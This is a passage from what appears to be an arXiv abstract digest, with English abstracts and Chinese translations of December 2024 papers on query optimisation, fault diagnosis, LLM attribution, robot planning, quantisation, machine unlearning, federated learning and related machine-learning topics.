摘要: 我们提出了一个新颖的学习查询优化模型,该模型提供查询提示,从而产生更好的执行计划。该模型解决了学习提示驱动的查询优化中的三个关键挑战:可靠的提示推荐(确保查询延迟不降级)、高效的提示探索和快速推理。我们对现有基于神经网络的提示优化方法进行了深入分析,并在实验中证实了它们的挑战。我们的替代方案包括基于一组上下文感知模型的新推理模式和用于可靠提示建议和快速推理的图形存储,以及一个具有本地搜索算法的预算控制训练过程,解决了指数搜索空间探索的问题。在标准基准测试中,我们的模型展示了接近于通过粗粒度提示所能实现的最佳优化能力。除了与操作器相关的提示之外,控制并行度(查询 dop)使我们的模型在JOB基准测试中实现了3倍的延迟改进,为优化设定了新标准。我们的模型可解释且易于调试,这对于在生产中部署尤为重要。
更新时间: 2024-12-05 06:00:34
领域: cs.DB,cs.AI,cs.LG,H.2.4; I.2.6; I.2.8
Knowledge Transfer based Evolutionary Deep Neural Network for Intelligent Fault Diagnosis
A fault diagnosis with commendable accuracy is essential for the reliability of industrial machines. Two main challenges affect the design of high-performing intelligent systems: (i) the selection of a suitable model and (ii) domain adaptation if there is a continuous change in operating conditions. Therefore, we propose an evolutionary Net2Net transformation (EvoN2N) that finds the best suitable DNN architecture with limited availability of labeled data samples. Net2Net transformation-based quick learning algorithm has been used in the evolutionary framework of Non-dominated sorting genetic algorithm II to obtain the best DNN architecture. Net2Net transformation-based quick learning algorithm uses the concept of knowledge transfer from one generation to the next for faster fitness evaluation. The proposed framework can obtain the best model for intelligent fault diagnosis without a long and time-consuming search process. The proposed framework has been validated on the Case Western Reserve University dataset, the Paderborn University dataset, and the gearbox fault detection dataset under different operating conditions. The best models obtained are capable of demonstrating an excellent diagnostic performance and classification accuracy of almost up to 100\% for most of the operating conditions.
Updated: 2024-12-05 05:50:39
标题: 基于知识转移的进化深度神经网络用于智能故障诊断
摘要: 具有良好准确性的故障诊断对于工业机器的可靠性至关重要。设计高性能智能系统面临两个主要挑战:(i)选择适当的模型和(ii)如果操作条件持续变化,则领域适应。因此,我们提出了一种进化Net2Net转换(EvoN2N),可以在有限的标记数据样本情况下找到最适合的深度神经网络(DNN)架构。基于Net2Net转换的快速学习算法已应用于非支配排序遗传算法II的进化框架中,以获取最佳的DNN架构。基于Net2Net转换的快速学习算法利用知识传递的概念,加快适应度评估的速度。所提出的框架可以在没有长时间且耗时的搜索过程的情况下获得智能故障诊断的最佳模型。所提出的框架已在Case Western Reserve大学数据集、Paderborn大学数据集和不同操作条件下的齿轮箱故障检测数据集上进行验证。获得的最佳模型能够展示出优秀的诊断性能和几乎达到100%的分类准确度,适用于大多数操作条件。
更新时间: 2024-12-05 05:50:39
领域: eess.SP,cs.AI,cs.SY,eess.SY,math.OC
Uniform Discretized Integrated Gradients: An effective attribution based method for explaining large language models
Integrated Gradients is a well-known technique for explaining deep learning models. It calculates feature importance scores by employing a gradient based approach computing gradients of the model output with respect to input features and accumulating them along a linear path. While this works well for continuous features spaces, it may not be the most optimal way to deal with discrete spaces like word embeddings. For interpreting LLMs (Large Language Models), there exists a need for a non-linear path where intermediate points, whose gradients are to be computed, lie close to actual words in the embedding space. In this paper, we propose a method called Uniform Discretized Integrated Gradients (UDIG) based on a new interpolation strategy where we choose a favorable nonlinear path for computing attribution scores suitable for predictive language models. We evaluate our method on two types of NLP tasks- Sentiment Classification and Question Answering against three metrics viz Log odds, Comprehensiveness and Sufficiency. For sentiment classification, we have used the SST2, IMDb and Rotten Tomatoes datasets for benchmarking and for Question Answering, we have used the fine-tuned BERT model on SQuAD dataset. Our approach outperforms the existing methods in almost all the metrics.
Updated: 2024-12-05 05:39:03
标题: 统一离散化的综合梯度:一种用于解释大型语言模型的有效归因方法
摘要: 综合梯度是一种用于解释深度学习模型的知名技术。它通过采用基于梯度的方法计算特征重要性得分,计算模型输出与输入特征的梯度,并沿着线性路径累积这些梯度。虽然这对于连续特征空间效果很好,但可能不是处理词嵌入等离散空间的最佳方式。为了解释大型语言模型(LLMs),需要一种非线性路径,其中进行梯度计算的中间点接近嵌入空间中的实际单词。在本文中,我们提出了一种名为均匀离散化综合梯度(UDIG)的方法,基于一种新的插值策略,我们选择一个适合预测语言模型的计算归因得分的有利非线性路径。我们在两种类型的自然语言处理任务上评估我们的方法-情感分类和问答,分别对三个指标进行评估,即对数几率、全面性和充分性。对于情感分类,我们使用了SST2、IMDb和Rotten Tomatoes数据集进行基准测试,对于问答,我们使用了在SQuAD数据集上微调的BERT模型。我们的方法在几乎所有指标上都优于现有方法。
更新时间: 2024-12-05 05:39:03
领域: cs.CL,cs.AI
Nl2Hltl2Plan: Scaling Up Natural Language Understanding for Multi-Robots Through Hierarchical Temporal Logic Task Representation
To enable non-experts to specify long-horizon, multi-robot collaborative tasks, language models are increasingly used to translate natural language commands into formal specifications. However, because translation can occur in multiple ways, such translations may lack accuracy or lead to inefficient multi-robot planning. Our key insight is that concise hierarchical specifications can simplify planning while remaining straightforward to derive from human instructions. We propose Nl2Hltl2Plan, a framework that translates natural language commands into hierarchical Linear Temporal Logic (LTL) and solves the corresponding planning problem. The translation involves two steps leveraging Large Language Models (LLMs). First, an LLM transforms instructions into a Hierarchical Task Tree, capturing logical and temporal relations. Next, a fine-tuned LLM converts sub-tasks into flat LTL formulas, which are aggregated into hierarchical specifications, with the lowest level corresponding to ordered robot actions. These specifications are then used with off-the-shelf planners. Our Nl2Hltl2Plan demonstrates the potential of LLMs in hierarchical reasoning for multi-robot task planning. Evaluations in simulation and real-world experiments with human participants show that Nl2Hltl2Plan outperforms existing methods, handling more complex instructions while achieving higher success rates and lower costs in task allocation and planning. Additional details are available at https://nl2hltl2plan.github.io .
Updated: 2024-12-05 05:37:46
标题: Nl2Hltl2Plan: 通过层次时间逻辑任务表示实现多机器人的自然语言理解扩展
摘要: 为了让非专家能够指定长期,多机器人协作任务,语言模型越来越多地被用来将自然语言命令翻译成形式规范。然而,由于翻译可能以多种方式进行,这种翻译可能缺乏准确性或导致效率低下的多机器人规划。我们的关键见解是简洁的层次规范可以简化规划,同时仍然易于从人类指令中推导出。我们提出了Nl2Hltl2Plan,这是一个将自然语言命令翻译成分层线性时态逻辑(LTL)并解决相应规划问题的框架。翻译涉及两个步骤,利用大型语言模型(LLMs)。首先,LLM将指令转换成一个层次任务树,捕捉逻辑和时态关系。接下来,一个经过微调的LLM将子任务转换成平面LTL公式,这些公式被聚合成层次规范,最低级别对应于有序的机器人动作。然后,这些规范与现成的规划器一起使用。我们的Nl2Hltl2Plan展示了LLMs在多机器人任务规划中层次推理的潜力。在模拟和真实世界实验中,与人类参与者一起进行的评估表明,Nl2Hltl2Plan优于现有方法,在处理更复杂的指令的同时实现了更高的成功率和更低的任务分配和规划成本。更多详细信息请访问https://nl2hltl2plan.github.io。
更新时间: 2024-12-05 05:37:46
领域: cs.RO,cs.AI,cs.LO
Fourier Boundary Features Network with Wider Catchers for Glass Segmentation
Glass largely blurs the boundary between the real world and the reflection. The special transmittance and reflectance quality have confused the semantic tasks related to machine vision. Therefore, how to clear the boundary built by glass, and avoid over-capturing features as false positive information in deep structure, matters for constraining the segmentation of reflection surface and penetrating glass. We proposed the Fourier Boundary Features Network with Wider Catchers (FBWC), which might be the first attempt to utilize sufficiently wide horizontal shallow branches without vertical deepening for guiding the fine granularity segmentation boundary through primary glass semantic information. Specifically, we designed the Wider Coarse-Catchers (WCC) for anchoring large area segmentation and reducing excessive extraction from a structural perspective. We embed fine-grained features by Cross Transpose Attention (CTA), which is introduced to avoid the incomplete area within the boundary caused by reflection noise. For excavating glass features and balancing high-low layers context, a learnable Fourier Convolution Controller (FCC) is proposed to regulate information integration robustly. The proposed method has been validated on three different public glass segmentation datasets. Experimental results reveal that the proposed method yields better segmentation performance compared with the state-of-the-art (SOTA) methods in glass image segmentation.
Updated: 2024-12-05 05:37:23
标题: Fourier边界特征网络与更宽的接收器用于玻璃分割
摘要: 玻璃在很大程度上模糊了现实世界与反射之间的界限。其特殊的透射和反射质量使与机器视觉相关的语义任务变得困惑。因此,如何清除玻璃构建的边界,并避免在深层结构中过度捕捉特征作为虚假正面信息,对于约束反射表面的分割和穿透玻璃至关重要。我们提出了具有更宽接收器的傅立叶边界特征网络(FBWC),这可能是第一次尝试利用足够宽的水平浅层分支,而无需垂直加深,以引导通过主要玻璃语义信息的细粒度分割边界。具体地,我们设计了更宽的粗接收器(WCC)来锚定大面积分割,并从结构角度减少过度提取。我们通过交叉转置注意(CTA)嵌入细粒度特征,以避免由反射噪音引起的边界内不完整区域。为了挖掘玻璃特征并平衡高低层上下文,我们提出了可学习的傅立叶卷积控制器(FCC),以稳健地调节信息整合。所提出的方法已在三个不同的公共玻璃分割数据集上进行了验证。实验结果表明,与玻璃图像分割中的最先进方法相比,所提出的方法具有更好的分割性能。
更新时间: 2024-12-05 05:37:23
领域: cs.CV,cs.AI
A Unified Framework for Evaluating the Effectiveness and Enhancing the Transparency of Explainable AI Methods in Real-World Applications
The rapid advancement of deep learning has resulted in substantial advancements in AI-driven applications; however, the "black box" characteristic of these models frequently constrains their interpretability, transparency, and reliability. Explainable artificial intelligence (XAI) seeks to elucidate AI decision-making processes, guaranteeing that explanations faithfully represent the model's rationale and correspond with human comprehension. Despite comprehensive research in XAI, a significant gap persists in standardized procedures for assessing the efficacy and transparency of XAI techniques across many real-world applications. This study presents a unified XAI evaluation framework incorporating extensive quantitative and qualitative criteria to systematically evaluate the correctness, interpretability, robustness, fairness, and completeness of explanations generated by AI models. The framework prioritizes user-centric and domain-specific adaptations, hence improving the usability and reliability of AI models in essential domains. To address deficiencies in existing evaluation processes, we suggest defined benchmarks and a systematic evaluation pipeline that includes data loading, explanation development, and thorough method assessment. The suggested framework's relevance and variety are evidenced by case studies in healthcare, finance, agriculture, and autonomous systems. These provide a solid basis for the equitable and dependable assessment of XAI methodologies. This paradigm enhances XAI research by offering a systematic, flexible, and pragmatic method to guarantee transparency and accountability in AI systems across many real-world contexts.
Updated: 2024-12-05 05:30:10
标题: 一个统一的框架:评估可解释人工智能方法在现实世界应用中的有效性并提高透明度
摘要: 深度学习的快速发展导致了人工智能驱动应用的实质性进展;然而,这些模型的“黑匣子”特征经常限制了它们的可解释性、透明性和可靠性。可解释人工智能(XAI)旨在阐明人工智能决策过程,确保解释忠实地代表模型的理由,并与人类理解相符。尽管在XAI领域进行了全面的研究,但在评估XAI技术在许多实际应用中的效力和透明度方面仍存在重大差距。本研究提出了一个统一的XAI评估框架,包括广泛的定量和定性标准,以系统评估人工智能模型生成的解释的正确性、可解释性、稳健性、公平性和完整性。该框架优先考虑用户中心和领域特定的适应性,从而提高了关键领域中人工智能模型的可用性和可靠性。为了解决现有评估流程中的不足,我们建议制定明确的基准和系统化的评估流程,包括数据加载、解释开发和彻底的方法评估。该建议的框架的相关性和多样性通过在医疗保健、金融、农业和自治系统等领域的案例研究得到证明。这些案例为公平和可靠地评估XAI方法提供了坚实基础。这种范式通过提供一种系统化、灵活和务实的方法来增强XAI研究,以确保在许多实际情境中的人工智能系统的透明度和责任性。
更新时间: 2024-12-05 05:30:10
领域: cs.AI
Weak-to-Strong Generalization Through the Data-Centric Lens
The weak-to-strong generalization phenomenon is the driver for important machine learning applications including highly data-efficient learning and, most recently, performing superalignment. While decades of research have resulted in numerous algorithms that produce strong empirical performance, understanding what aspects of data enable weak-to-strong generalization has been understudied. We propose a simple data-centric mechanism that characterizes weak-to-strong generalization: the overlap density. Intuitively, generalization tracks the number of points that contain overlaps, i.e., both easy patterns (learnable by a weak model) and challenging patterns (only learnable by a stronger model), as with such points, weak predictions can be used to learn challenging patterns by stronger models. We provide a practical overlap detection algorithm to find such points in datasets and leverage them to learn, among multiple sources of data, which to query when seeking to maximize overlap density and thereby enhance weak-to-strong generalization. We present a theoretical result showing that the generalization benefit is a function of the overlap density and a regret bound for our data selection algorithm. Empirically, we validate the mechanism and the overlap detection algorithm on a wide array of settings.
Updated: 2024-12-05 05:29:19
标题: 弱到强的泛化:通过数据中心的视角
摘要: 弱到强泛化现象是重要机器学习应用的驱动因素,包括高效学习和最近的超对齐。几十年的研究产生了许多能够产生强实证表现的算法,但了解数据的哪些方面促使弱到强泛化的能力仍未得到充分研究。我们提出了一个简单的以数据为中心的机制来描述弱到强泛化:重叠密度。直观地,泛化跟踪包含重叠的点的数量,即既包含易学习模式(弱模型可以学习)又包含挑战性模式(只有更强模型才能学习)的点。通过这些点,更弱的预测可以被更强的模型用于学习挑战性模式。我们提供了一个实用的重叠检测算法,用于发现数据集中的这些点,并利用它们在多个数据源中学习,以最大化重叠密度,从而增强弱到强泛化。我们提出了一个理论结果,表明泛化收益是重叠密度的函数,并为我们的数据选择算法提供了一个遗憾界限。在大量设置中,我们在实证上验证了该机制和重叠检测算法。
更新时间: 2024-12-05 05:29:19
领域: cs.LG,cs.AI,stat.ML
Transferring self-supervised pre-trained models for SHM data anomaly detection with scarce labeled data
Structural health monitoring (SHM) has experienced significant advancements in recent decades, accumulating massive monitoring data. Data anomalies inevitably exist in monitoring data, posing significant challenges to their effective utilization. Recently, deep learning has emerged as an efficient and effective approach for anomaly detection in bridge SHM. Despite its progress, many deep learning models require large amounts of labeled data for training. The process of labeling data, however, is labor-intensive, time-consuming, and often impractical for large-scale SHM datasets. To address these challenges, this work explores the use of self-supervised learning (SSL), an emerging paradigm that combines unsupervised pre-training and supervised fine-tuning. The SSL-based framework aims to learn from only a very small quantity of labeled data by fine-tuning, while making the best use of the vast amount of unlabeled SHM data by pre-training. Mainstream SSL methods are compared and validated on the SHM data of two in-service bridges. Comparative analysis demonstrates that SSL techniques boost data anomaly detection performance, achieving increased F1 scores compared to conventional supervised training, especially given a very limited amount of labeled data. This work manifests the effectiveness and superiority of SSL techniques on large-scale SHM data, providing an efficient tool for preliminary anomaly detection with scarce label information.
Updated: 2024-12-05 05:25:30
标题: 将自监督预训练模型转移到稀缺标记数据的结构健康监测数据异常检测中
摘要: 结构健康监测(SHM)在近几十年来取得了显著进展,积累了大量的监测数据。监测数据中不可避免地存在数据异常,给它们的有效利用带来了重大挑战。最近,深度学习已经成为桥梁SHM中异常检测的一种高效、有效的方法。尽管取得了进展,许多深度学习模型需要大量的标记数据进行训练。然而,标记数据的过程是费力、耗时的,并且对于大规模SHM数据集来说通常是不切实际的。为了解决这些挑战,本文探讨了自监督学习(SSL)的应用,这是一种结合了无监督预训练和监督微调的新兴范式。基于SSL的框架旨在通过微调仅学习少量标记数据,同时通过预训练充分利用大量未标记的SHM数据。主流的SSL方法在两座在役桥梁的SHM数据上进行了比较和验证。比较分析表明,SSL技术提升了数据异常检测性能,相较于传统的监督训练,特别是在标记数据量非常有限的情况下,获得了更高的F1分数。这项工作展示了SSL技术在大规模SHM数据上的有效性和优越性,为稀缺标记信息的初步异常检测提供了一种高效的工具。
更新时间: 2024-12-05 05:25:30
领域: cs.LG,cs.CE
AyutthayaAlpha: A Thai-Latin Script Transliteration Transformer
This study introduces AyutthayaAlpha, an advanced transformer-based machine learning model designed for the transliteration of Thai proper names into Latin script. Our system achieves state-of-the-art performance with 82.32% first-token accuracy and 95.24% first-three-token accuracy, while maintaining a low character error rate of 0.0047. The complexity of Thai phonology, including tonal features and vowel length distinctions, presents significant challenges for accurate transliteration, which we address through a novel two-model approach: AyutthayaAlpha-Small, based on the ByT5 architecture, and AyutthayaAlpha-VerySmall, a computationally efficient variant that unexpectedly outperforms its larger counterpart. Our research combines linguistic rules with deep learning, training on a carefully curated dataset of 1.2 million Thai-Latin name pairs, augmented through strategic upsampling to 2.7 million examples. Extensive evaluations against existing transliteration methods and human expert benchmarks demonstrate that AyutthayaAlpha not only achieves superior accuracy but also effectively captures personal and cultural preferences in name romanization. The system's practical applications extend to cross-lingual information retrieval, international data standardization, and identity verification systems, with particular relevance for government databases, academic institutions, and global business operations. This work represents a significant advance in bridging linguistic gaps between Thai and Latin scripts, while respecting the cultural and personal dimensions of name transliteration.
Updated: 2024-12-05 05:18:09
标题: “阿育塔亚阿尔法:一种泰国-拉丁文字转译转换器”
摘要: 这项研究介绍了AyutthayaAlpha,这是一种基于Transformer的先进机器学习模型,专门用于将泰国人名转写成拉丁字母。我们的系统实现了82.32%的首词准确率和95.24%的前三个词准确率,同时保持了低至0.0047的字符错误率。泰语语音学的复杂性,包括声调特征和元音长度的区别,给准确转写带来了重大挑战,我们通过一种新颖的双模型方法解决了这一问题:基于ByT5架构的AyutthayaAlpha-Small和计算效率高、出乎意料地优于其较大对应物的AyutthayaAlpha-VerySmall。我们的研究结合了语言规则和深度学习,在精心策划的120万泰拉名称对数据集上进行训练,通过战略性上采样扩增至270万示例。与现有的转写方法和人类专家基准的广泛评估表明,AyutthayaAlpha不仅实现了更高的准确性,还有效地捕捉了姓名罗马化中的个人和文化偏好。该系统的实际应用涵盖了跨语言信息检索、国际数据标准化和身份验证系统,尤其适用于政府数据库、学术机构和全球商业运营。这项工作在弥合泰国和拉丁文字之间的语言差距的同时,尊重了姓名转写的文化和个人维度,代表了一个重大进步。
更新时间: 2024-12-05 05:18:09
领域: cs.CL,cs.AI
RILQ: Rank-Insensitive LoRA-based Quantization Error Compensation for Boosting 2-bit Large Language Model Accuracy
Low-rank adaptation (LoRA) has become the dominant method for parameter-efficient LLM fine-tuning, with LoRA-based quantization error compensation (LQEC) emerging as a powerful tool for recovering accuracy in compressed LLMs. However, LQEC has underperformed in sub-4-bit scenarios, with no prior investigation into understanding this limitation. We propose RILQ (Rank-Insensitive LoRA-based Quantization Error Compensation) to understand fundamental limitation and boost 2-bit LLM accuracy. Based on rank analysis revealing model-wise activation discrepancy loss's rank-insensitive nature, RILQ employs this loss to adjust adapters cooperatively across layers, enabling robust error compensation with low-rank adapters. Evaluations on LLaMA-2 and LLaMA-3 demonstrate RILQ's consistent improvements in 2-bit quantized inference across various state-of-the-art quantizers and enhanced accuracy in task-specific fine-tuning. RILQ maintains computational efficiency comparable to existing LoRA methods, enabling adapter-merged weight-quantized LLM inference with significantly enhanced accuracy, making it a promising approach for boosting 2-bit LLM performance.
Updated: 2024-12-05 05:05:01
标题: RILQ:基于LoRA的排名无关的2位大型语言模型准确性提升的量化误差补偿
摘要: 低秩适应(LoRA)已成为参数高效的LLM微调的主要方法,LoRA基于的量化误差补偿(LQEC)已成为在压缩的LLMs中恢复准确性的强大工具。然而,在低于4位的情况下,LQEC的表现不佳,之前没有对这一限制进行调查。我们提出了RILQ(基于秩不敏感的LoRA量化误差补偿),以理解基本限制并提高2位LLM的准确性。基于秩分析揭示模型间激活差异损失的秩不敏感性,RILQ利用这种损失来协作地调整各层的适配器,实现了低秩适配器的稳健误差补偿。在LLaMA-2和LLaMA-3上的评估表明,RILQ在各种最先进的量化器中2位量化推理中持续改进,并在特定任务微调中提高了准确性。RILQ保持了与现有LoRA方法相当的计算效率,使得适配器合并的权重量化LLM推理在准确性上有了显著提高,这使其成为提升2位LLM性能的一种有前途的方法。
更新时间: 2024-12-05 05:05:01
领域: cs.LG,cs.AI
Fine-Grained Sentiment Analysis of Electric Vehicle User Reviews: A Bidirectional LSTM Approach to Capturing Emotional Intensity in Chinese Text
The rapid expansion of the electric vehicle (EV) industry has highlighted the importance of user feedback in improving product design and charging infrastructure. Traditional sentiment analysis methods often oversimplify the complexity of user emotions, limiting their effectiveness in capturing nuanced sentiments and emotional intensities. This study proposes a Bidirectional Long Short-Term Memory (Bi-LSTM) network-based sentiment scoring model to analyze user reviews of EV charging infrastructure. By assigning sentiment scores ranging from 0 to 5, the model provides a fine-grained understanding of emotional expression. Leveraging a dataset of 43,678 reviews from PC Auto, the study employs rigorous data cleaning and preprocessing, including tokenization and stop word removal, to optimize input for deep learning. The Bi-LSTM model demonstrates significant improvements over traditional approaches like SnowNLP across key evaluation metrics, including Mean Squared Error (MSE), Mean Absolute Error (MAE), and Explained Variance Score (EVS). These results highlight the model's superior capability to capture nuanced sentiment dynamics, offering valuable insights for targeted product and service enhancements in the EV ecosystem.
Updated: 2024-12-05 05:04:29
标题: 细粒度电动汽车用户评论情感分析:一种双向LSTM方法捕捉中文文本中的情感强度
摘要: 电动汽车(EV)行业的快速扩张突显了用户反馈在改善产品设计和充电基础设施方面的重要性。传统情感分析方法往往过于简化用户情绪的复杂性,限制了它们在捕捉微妙情感和情感强度方面的效果。本研究提出了一种基于双向长短期记忆(Bi-LSTM)网络的情感评分模型,用于分析EV充电基础设施的用户评论。通过为评论分配从0到5的情感得分,该模型提供了对情感表达的细致理解。利用PC Auto的43,678条评论数据集,研究采用严格的数据清洗和预处理,包括标记化和停用词去除,以优化深度学习的输入。Bi-LSTM模型在关键评估指标(包括均方误差(MSE),平均绝对误差(MAE)和解释方差分数(EVS))上表现出明显改进,超过了SnowNLP等传统方法。这些结果突显了该模型捕捉微妙情感动态的卓越能力,为EV生态系统中针对性产品和服务的改进提供了宝贵见解。
更新时间: 2024-12-05 05:04:29
领域: cs.AI
Remaining-data-free Machine Unlearning by Suppressing Sample Contribution
Machine unlearning (MU) is to forget data from a well-trained model, which is practically important due to the ``right to be forgotten''. The unlearned model should approach the retrained model, where the forgetting data are not involved in the training process and hence do not contribute to the retrained model. Considering the forgetting data's absence during retraining, we think unlearning should withdraw their contribution from the pre-trained model. The challenge is that when tracing the learning process is impractical, how to quantify and detach sample's contribution to the dynamic learning process using only the pre-trained model. We first theoretically discover that sample's contribution during the process will reflect in the learned model's sensitivity to it. We then practically design a novel method, namely MU-Mis (Machine Unlearning by Minimizing input sensitivity), to suppress the contribution of the forgetting data. Experimental results demonstrate that MU-Mis can unlearn effectively and efficiently without utilizing the remaining data. It is the first time that a remaining-data-free method can outperform state-of-the-art (SoTA) unlearning methods that utilize the remaining data.
Updated: 2024-12-05 04:45:32
标题: 通过抑制样本贡献实现无数据的机器遗忘
摘要: 机器遗忘(MU)是指从一个训练良好的模型中忘记数据,这在实践中非常重要,因为涉及到“被遗忘的权利”。被遗忘的模型应该接近重新训练的模型,在重新训练过程中不涉及被遗忘的数据,因此不会对重新训练的模型产生影响。考虑到在重新训练过程中遗忘数据的缺失,我们认为遗忘应该撤销它们对预训练模型的贡献。挑战在于,当跟踪学习过程是不切实际的时候,如何仅使用预训练模型来量化和分离样本对动态学习过程的贡献。我们首先在理论上发现,在过程中样本的贡献将反映在学习模型对其的敏感性上。然后,我们实际设计了一种新方法,即MU-Mis(通过最小化输入敏感性实现机器遗忘),以抑制遗忘数据的贡献。实验结果表明,MU-Mis可以有效高效地进行遗忘,而不使用剩余数据。这是第一次一个不使用剩余数据的方法能够胜过利用剩余数据的最新技术(SoTA)遗忘方法。
更新时间: 2024-12-05 04:45:32
领域: cs.LG
PreAct: Prediction Enhances Agent's Planning Ability
Addressing the disparity between forecasts and actual results can enable individuals to expand their thought processes and stimulate self-reflection, thus promoting accurate planning. In this research, we present **PreAct**, an agent framework that integrates **pre**diction, **rea**soning, and **act**ion. By utilizing the information derived from predictions, the large language model (LLM) agent can provide a wider range and more strategically focused reasoning. This leads to more efficient actions that aid the agent in accomplishing intricate tasks. Our experimental results show that PreAct surpasses the ReAct method in completing complex tasks and that PreAct's performance can be further improved when paired with other memory or selection strategy techniques. We presented the model with varying quantities of historical predictions and discovered that these predictions consistently enhance LLM planning.The variances in single-step reasoning between PreAct and ReAct indicate that PreAct indeed has benefits in terms of diversity and strategic orientation over ReAct.
Updated: 2024-12-05 04:40:54
标题: PreAct:预测增强了代理的规划能力
摘要: 解决预测与实际结果之间的差距可以帮助个人拓展思维过程并激发自我反思,从而促进准确的规划。在这项研究中,我们提出了**PreAct**,这是一个整合了**预测**、**推理**和**行动**的代理框架。通过利用从预测中得出的信息,大型语言模型(LLM)代理可以提供更广泛范围和更具战略性的推理。这导致更有效的行动,有助于代理完成复杂任务。我们的实验结果显示,PreAct在完成复杂任务方面优于ReAct方法,而当与其他记忆或选择策略技术配对时,PreAct的性能可以进一步提高。我们对模型提供了不同数量的历史预测,并发现这些预测始终增强了LLM的规划能力。PreAct和ReAct之间的单步推理差异表明,PreAct确实在多样性和战略取向方面具有优势。
更新时间: 2024-12-05 04:40:54
领域: cs.CL,cs.AI
Network Formation and Dynamics Among Multi-LLMs
Social networks fundamentally shape human opinions, behaviors, and the dissemination of information. As large language models (LLMs) like GPT, Claude, and Llama increasingly integrate into social and professional settings, understanding their behavior in the context of social interactions and network formation becomes essential. This study develops a framework to systematically examine whether the network formation behaviors of multiple LLMs approximate certain aspects of human network dynamics. By simulating interactions among LLM agents across various model families, we observe that these models consistently exhibit key patterns associated with social network principles including preferential attachment, triadic closure, homophily, community structure, and the small-world phenomenon when forming networks. Moreover, LLMs adapt their network formation strategies based on each network's characteristics, reflecting the context-dependent nature of human behavior: in Facebook networks, they prioritize triadic closure and homophily, mirroring close-knit friendships; in phone networks, homophily and preferential attachment dominate, capturing personal and professional connections, while in employment networks, LLMs favor heterophily and high-degree connections, aligning with career advancement dynamics. These results open new avenues for using LLMs in network science research, with potential applications in agent-based modeling and synthetic network generation.
Updated: 2024-12-05 04:35:22
标题: 多次生灵模型之间的网络形成与动态
摘要: 社交网络在根本上塑造了人类的观点、行为和信息传播。随着像GPT、Claude和Llama这样的大型语言模型(LLMs)越来越多地整合到社交和专业环境中,理解它们在社交互动和网络形成背景下的行为变得至关重要。本研究开发了一个框架,系统地检查多个LLMs的网络形成行为是否接近人类网络动态的某些方面。通过模拟不同模型家族中LLM代理之间的交互作用,我们观察到这些模型在形成网络时一贯表现出与社交网络原则相关的关键模式,包括优先附着、三角闭合、同质性、社区结构和小世界现象。此外,LLMs根据每个网络的特征调整其网络形成策略,反映了人类行为的依赖于环境的特性:在Facebook网络中,它们优先考虑三角闭合和同质性,反映了密切的友谊;在电话网络中,同质性和优先附着占主导地位,捕捉了个人和职业联系,而在就业网络中,LLMs偏爱异质性和高度连接,符合职业晋升动态。这些结果为在网络科学研究中使用LLMs开辟了新的途径,潜在应用包括基于代理的建模和合成网络生成。
更新时间: 2024-12-05 04:35:22
领域: cs.SI,cs.AI,cs.CL,cs.MA
Yi-Lightning Technical Report
This technical report presents Yi-Lightning, our latest flagship large language model (LLM). It achieves exceptional performance, ranking 6th overall on Chatbot Arena, with particularly strong results (2nd to 4th place) in specialized categories including Chinese, Math, Coding, and Hard Prompts. Yi-Lightning leverages an enhanced Mixture-of-Experts (MoE) architecture, featuring advanced expert segmentation and routing mechanisms coupled with optimized KV-caching techniques. Our development process encompasses comprehensive pre-training, supervised fine-tuning (SFT), and reinforcement learning from human feedback (RLHF), where we devise deliberate strategies for multi-stage training, synthetic data construction, and reward modeling. Furthermore, we implement RAISE (Responsible AI Safety Engine), a four-component framework to address safety issues across pre-training, post-training, and serving phases. Empowered by our scalable super-computing infrastructure, all these innovations substantially reduce training, deployment and inference costs while maintaining high-performance standards. With further evaluations on public academic benchmarks, Yi-Lightning demonstrates competitive performance against top-tier LLMs, while we observe a notable disparity between traditional, static benchmark results and real-world, dynamic human preferences. This observation prompts a critical reassessment of conventional benchmarks' utility in guiding the development of more intelligent and powerful AI systems for practical applications. Yi-Lightning is now available through our developer platform at https://platform.lingyiwanwu.com.
Updated: 2024-12-05 04:29:49
标题: 易-闪电技术报告
摘要: 这份技术报告介绍了我们最新的旗舰大型语言模型Yi-Lightning。它在Chatbot Arena上取得了卓越的表现,在总体排名中名列第六,特别在包括中文、数学、编码和难题等专业类别中表现强劲(排名第二至第四)。Yi-Lightning利用了增强的专家混合(MoE)架构,具有先进的专家分割和路由机制,配合优化的KV缓存技术。我们的开发过程包括全面的预训练、监督微调(SFT)和从人类反馈中强化学习(RLHF),我们设计了多阶段训练、合成数据构建和奖励建模的刻意策略。此外,我们实施了RAISE(负责任的AI安全引擎),一个包括四个组件的框架,以解决在预训练、后训练和服务阶段的安全问题。在我们可扩展的超级计算基础设施的支持下,所有这些创新显著降低了训练、部署和推断成本,同时保持高性能标准。通过进一步评估公共学术基准测试,Yi-Lightning展现出与顶尖大型语言模型的竞争性表现,同时我们观察到传统的静态基准测试结果与实际动态人类偏好之间存在明显差异。这一观察推动了对传统基准测试在引导更智能、更强大的AI系统开发方面的实用性进行重要重新评估。Yi-Lightning现在可以通过我们的开发者平台https://platform.lingyiwanwu.com获取。
更新时间: 2024-12-05 04:29:49
领域: cs.CL,cs.AI,cs.LG
GP-FL: Model-Based Hessian Estimation for Second-Order Over-the-Air Federated Learning
Second-order methods are widely adopted to improve the convergence rate of learning algorithms. In federated learning (FL), these methods require the clients to share their local Hessian matrices with the parameter server (PS), which comes at a prohibitive communication cost. A classical solution to this issue is to approximate the global Hessian matrix from the first-order information. Unlike in idealized networks, this solution does not perform effectively in over-the-air FL settings, where the PS receives noisy versions of the local gradients. This paper introduces a novel second-order FL framework tailored for wireless channels. The pivotal innovation lies in the PS's capability to directly estimate the global Hessian matrix from the received noisy local gradients via a non-parametric method: the PS models the unknown Hessian matrix as a Gaussian process, and then uses the temporal relation between the gradients and Hessian along with the channel model to find a stochastic estimator for the global Hessian matrix. We refer to this method as Gaussian process-based Hessian modeling for wireless FL (GP-FL) and show that it exhibits a linear-quadratic convergence rate. Numerical experiments on various datasets demonstrate that GP-FL outperforms all classical baseline first and second order FL approaches.
Updated: 2024-12-05 04:27:41
标题: GP-FL:基于模型的海森估计用于二阶空中联邦学习
摘要: Second-order methods are widely used to improve the convergence rate of learning algorithms. In federated learning (FL), these methods require clients to share their local Hessian matrices with the parameter server (PS), which incurs significant communication costs. A common solution to this problem is to approximate the global Hessian matrix from first-order information. However, in practical FL scenarios with noisy local gradients, this approach is not effective. This paper presents a novel second-order FL framework designed for wireless channels. The key innovation is the PS's ability to directly estimate the global Hessian matrix from received noisy local gradients using a non-parametric method. The PS models the unknown Hessian matrix as a Gaussian process and utilizes the temporal relation between gradients and Hessians, along with the channel model, to derive a stochastic estimator for the global Hessian matrix. This method, referred to as Gaussian process-based Hessian 